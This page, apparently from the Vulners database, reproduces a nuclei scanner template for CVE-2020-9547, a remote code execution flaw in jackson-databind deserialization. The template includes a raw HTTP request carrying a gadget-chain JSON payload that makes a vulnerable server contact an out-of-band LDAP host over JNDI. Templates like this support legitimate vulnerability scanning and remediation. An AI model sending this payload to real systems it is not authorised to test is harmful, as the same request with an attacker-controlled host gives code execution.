Lucene search
K

FasterXML jackson-databind - Deserialization Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

FasterXML jackson-databind allows remote code execution via deserialization of untrusted data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: jackson-databind (Publicly disclosed vulnerability) found in Network Performance Insight
4 Aug 202018:51
ibm
IBM Security Bulletins
Security Bulletin: Common Vulnerabilities found in Cloudera Data Platform Private Cloud base with IBM
2 Mar 202614:33
ibm
IBM Security Bulletins
Security Bulletin: IBM Cloud Pak for Multicloud Management Monitoring has patched several open source dependencies
18 Dec 202115:42
ibm
IBM Security Bulletins
Security Bulletin: IBM Security Guardium Insights is affected by Components with known vulnerabilities
6 Oct 202112:30
ibm
IBM Security Bulletins
Security Bulletin: Vulnerability in jackson-databind affects IBM Process Mining (Multiple CVEs)
1 Feb 202321:46
ibm
IBM Security Bulletins
Security Bulletin: Series of vulnerabilities in FasterXML jackson-databind affect Apache Solr shipped with IBM Operations Analytics - Log Analysis
22 Apr 202105:30
ibm
IBM Security Bulletins
Security Bulletin: IBM InfoSphere Information Server is affected by multiple vulnerabilities in Jackson databind
2 Jun 202123:46
ibm
IBM Security Bulletins
Security Bulletin: Multiple CVEs affect IBM Integration Designer
1 Feb 202319:40
ibm
IBM Security Bulletins
Security Bulletin: IBM Disconnected Log Collector is vulnerable to using components with known vulnerabilities
16 Jun 202221:33
ibm
IBM Security Bulletins
Security Bulletin: Jackson-Databind Vulnerabilities Affect the B2B API of IBM Sterling B2B Integrator
6 Oct 202114:34
ibm
Rows per page
id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization Remote Code Execution
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.18671
    epss-percentile: 0.96918
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,vkev,vuln

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["java.util.Properties",{"UserTransaction":"{{payload_jndi_ldap}}"}]}]

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "contains_any(content_type, 'application/json', 'text/plain')"
          - "status_code == 200 || status_code == 400 || status_code == 500"
        condition: and

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or
# digest: 4a0a00473045022100b4b58ea1604e3b15e6d433e0d30a84afce7c5c4f1aca45628152e43e4939a0a602202e02a2ad80ea5c09bd7d48c31fb1b6bdcddf8b38d8a65e832a4dead241f6826f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
CVSS 3.19.8
EPSS0.18671
21